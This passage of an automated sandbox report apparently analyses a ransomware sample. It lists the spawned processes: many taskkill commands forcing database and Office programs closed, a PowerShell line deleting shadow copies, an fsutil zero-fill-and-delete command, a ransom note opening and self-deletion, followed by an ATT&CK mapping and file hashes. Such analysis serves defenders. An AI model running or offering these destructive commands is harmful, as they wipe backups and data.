- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2340

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2424

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2520

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1372

C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:1080

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:2632

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:3900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2⤵
- Deletes itself
PID:1856

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:2268

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
1a4147f7e232ed003611eb4fc17ed0b8

SHA1
60c2e8ff1cc718316ff3a1cb2ba82ba372d848d3

SHA256
379a636cc636f401612333ef987656defd7be9a80fa4718cb5b81c786fcb9160

SHA512
54e4327974ed657f01e6e08261379633532b51029f73851ac74d0c7f29c8d45328563311b4e6d88c6d59046314031f652edfbb3a3cad939da731561b7954eb70

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
MD5
959a8cd3f017d8a1dcdc25c218d73de3

SHA1
7e86f45508db66c4421a7ca95b9436dba8f2ab28

SHA256
87dd03a96b94afeac8fac544c71467550680fe6ced239bbc6dd368357c67f894

SHA512
cbb39c3adfd749a25e7daf2a5bf0077b3695bcb892c682433a701897410e9da46419b122c435aee20fbdb48dfc2baef9b663ade387a76f05f0a2c8eab6239e6f

Download Submit
memory/112-27-0x0000000000000000-mapping.dmp

Download
memory/316-1-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/316-0-0x000007FEF66E0000-0x000007FEF70CC000-memory.dmp

Filesize
9.9MB

Download
memory/396-26-0x0000000000000000-mapping.dmp

Download
memory/624-28-0x0000000000000000-mapping.dmp

Download
memory/672-23-0x0000000000000000-mapping.dmp

Download
memory/828-17-0x0000000000000000-mapping.dmp

Download
memory/856-19-0x0000000000000000-mapping.dmp

Download
memory/968-22-0x0000000000000000-mapping.dmp

Download
memory/1080-63-0x0000000000000000-mapping.dmp

Download
memory/1084-30-0x0000000000000000-mapping.dmp

Download
memory/1212-6-0x0000000000000000-mapping.dmp

Download
memory/1272-18-0x0000000000000000-mapping.dmp

Download
memory/1372-62-0x0000000000000000-mapping.dmp

Download
memory/1408-21-0x0000000000000000-mapping.dmp

Download
memory/1420-25-0x0000000000000000-mapping.dmp

Download
memory/1552-11-0x0000000000000000-mapping.dmp

Download
memory/1564-31-0x0000000000000000-mapping.dmp

Download
memory/1572-12-0x0000000000000000-mapping.dmp

Download
memory/1660-9-0x0000000000000000-mapping.dmp

Download
memory/1668-10-0x0000000000000000-mapping.dmp

Download
memory/1688-24-0x0000000000000000-mapping.dmp

Download
memory/1800-8-0x0000000000000000-mapping.dmp

Download
memory/1804-32-0x0000000000000000-mapping.dmp

Download
memory/1820-29-0x0000000000000000-mapping.dmp

Download
memory/1852-3-0x0000000000000000-mapping.dmp

Download
memory/1856-64-0x0000000000000000-mapping.dmp

Download
memory/1872-4-0x0000000000000000-mapping.dmp

Download
memory/1876-7-0x0000000000000000-mapping.dmp

Download
memory/1888-5-0x0000000000000000-mapping.dmp

Download
memory/1916-13-0x0000000000000000-mapping.dmp

Download
memory/1928-14-0x0000000000000000-mapping.dmp

Download
memory/1980-16-0x0000000000000000-mapping.dmp

Download
memory/2016-15-0x0000000000000000-mapping.dmp

Download
memory/2040-20-0x0000000000000000-mapping.dmp

Download
memory/2052-33-0x0000000000000000-mapping.dmp

Download
memory/2084-34-0x0000000000000000-mapping.dmp

Download
memory/2124-35-0x0000000000000000-mapping.dmp

Download
memory/2164-36-0x0000000000000000-mapping.dmp

Download
memory/2200-37-0x0000000000000000-mapping.dmp

Download
memory/2216-38-0x0000000000000000-mapping.dmp

Download
memory/2248-39-0x0000000000000000-mapping.dmp

Download
memory/2264-40-0x0000000000000000-mapping.dmp

Download
memory/2268-67-0x0000000000000000-mapping.dmp

Download
memory/2288-41-0x0000000000000000-mapping.dmp

Download
memory/2340-42-0x0000000000000000-mapping.dmp

Download
memory/2364-43-0x0000000000000000-mapping.dmp

Download
memory/2392-44-0x0000000000000000-mapping.dmp

Download
memory/2424-45-0x0000000000000000-mapping.dmp

Download
memory/2468-46-0x0000000000000000-mapping.dmp

Download
memory/2496-47-0x0000000000000000-mapping.dmp

Download
memory/2520-48-0x0000000000000000-mapping.dmp

Download
memory/2536-49-0x0000000000000000-mapping.dmp

Download
memory/2564-50-0x0000000000000000-mapping.dmp

Download
memory/2588-51-0x0000000000000000-mapping.dmp

Download
memory/2612-52-0x0000000000000000-mapping.dmp

Download
memory/2632-65-0x0000000000000000-mapping.dmp

Download
memory/2636-53-0x0000000000000000-mapping.dmp

Download
memory/2672-54-0x0000000000000000-mapping.dmp

Download
memory/2696-55-0x0000000000000000-mapping.dmp

Download
memory/2696-60-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/2696-59-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/2696-58-0x000000001AB50000-0x000000001AB51000-memory.dmp

Filesize
4KB

Download
memory/2696-57-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download
memory/2696-56-0x000007FEF66E0000-0x000007FEF70CC000-memory.dmp

Filesize
9.9MB

Download
memory/3900-68-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads